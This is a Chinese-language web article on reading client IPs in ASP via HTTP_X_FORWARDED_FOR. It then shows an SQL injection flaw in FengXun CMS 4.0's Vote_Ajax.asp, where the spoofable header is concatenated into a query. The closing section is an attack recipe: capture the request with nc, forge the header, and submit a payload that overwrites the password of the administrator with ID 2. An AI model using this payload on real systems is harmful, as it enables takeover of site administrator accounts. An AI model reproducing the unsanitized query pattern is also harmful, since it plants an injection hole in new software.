HTTPXFORWARDEDFOR伪造 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    在 ASP 中使用 Request.ServerVariables("REMOTE_ADDR") 来取得客户端的 IP 地址,但如果客户端是使用代理服务器来访问,那取到的就是代理服务器的 IP 地址,而不是真正的客户端 IP 地址,

HTTPXFORWARDEDFOR伪造

。要想透过代理服务器取得客户端的真实 IP 地址,就要使用 Request.ServerVariables("HTTP_X_FORWARDED_FOR") 来读取。

    不过要注意的事,并不是每个代理服务器都能用 Request.ServerVariables("HTTP_X_FORWARDED_FOR") 来读取客户端的真实 IP,有些用此方法读取到的仍然是代理服务器的 IP。

    还有一点需要注意的是:如果客户端没有通过代理服务器来访问,那么用Request.ServerVariables ("HTTP_X_FORWARDED_FOR") 取到的值将是空的。因此,如果要在程序中使用此方法,可以这样处理:

    ......

    userip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")

    If userip = "" Then userip = Request.ServerVariables("REMOTE_ADDR")

    ......

    即:如果客户端通过代理服务器,则取 HTTP_X_FORWARDED_FOR 的值,如果没通过代理服务器,就取 REMOTE_ADDR 的值,

电脑资料

HTTPXFORWARDEDFOR伪造》(https://www.unjs.com)。

    下面我们来看一个风讯4.0的注入漏洞代码:

    存在注入漏洞的是Vote/Vote_Ajax.asp文件,其第48~53行的代码如下。

    VisitIP = request.ServerVariables("HTTP_X_FORWARDED_FOR")

    If VisitIP = "" then

    VisitIP = request.ServerVariables("REMOTE_ADDR")

    End If

    //如果VisitIP不为空,直接就将变量HTTP_X_FORWARDED_FOR提交到数据库中查询了

    Set VS_RS = Conn.Execute("Select top 1 VoteTime from FS_VS_Items_Result where TID = "&TID&" and VoteIp='"&VisitIP&"' order by RID desc")

    //这里明显构成了注入条件

    此文件存在的注入漏洞,我们直接伪造就行了。关于HTTP_X_FORWARDED_FOR变量的伪造,我们只需要用NC抓包,然后再相应的修改抓取的数据包再进行提交就可以了。

    此漏洞的构造语句:127.0.0.1');update FS_MF_Admin set Admin_Pass_Word=' 49ba59abbe56e057' where id=2--提交成功后,ID为2的管理员的密码就被我们改为了123456了。

最新文章